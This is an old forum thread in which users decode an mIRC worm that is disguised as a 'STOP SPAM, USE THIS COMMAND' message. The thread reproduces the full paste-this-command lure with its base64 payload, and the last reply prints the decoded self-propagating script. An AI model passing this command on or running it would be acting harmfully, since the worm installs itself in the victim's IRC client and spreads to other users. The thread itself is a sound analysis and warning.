Anyone here write (or able to decipher) mIRC scripting??

aphex

Moderator<br>All Things Apple
Moderator
Jul 19, 2001
38,572
2
91
Haha, got this msg when i joined a channel a few mins ago and was curious what it would decode to...

I used to write some stuff a few years back, but its been WAAY too long...



<<
STOP SPAM, USE THIS COMMAND: //write nospam $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3BhbSAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs nospam | //mode $me +R
>>



Anyone able to decode that? :)
 

Gunslinger08

Lifer
Nov 18, 2001
13,234
2
81
That's very common.. it's a mirc "virus" that sends messages to other users when they join a room your in.. just a worm.

Josh
 

skace

Lifer
Jan 23, 2001
14,488
7
81
I can code in mIRC but this machine does not have the program (work pc). This is very easy though...

Type this in any window: //echo I don't run commands that write encoded messages to ini files : $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3BhbSAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m)

That will tell you what the decode would have been at the end of the echo, since it will be in an echo it will be harmless...

Although, last time I checked mIRC didn't have a built in decode aliase (or I've never found a use for it) so the command might just fail completely.
 

AnthraX101

Senior member
Oct 7, 2001
771
0
0
It creates a mini-script with the folowing code:

on !+1:join:#:{ .auser 2 $nick | .msg $nick STOP SPAM, USE THIS COMMAND: //write nospam $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs nospam $chr(124) //mode $ $+ me +R } }

So it just spreads itself on...

AnthraX101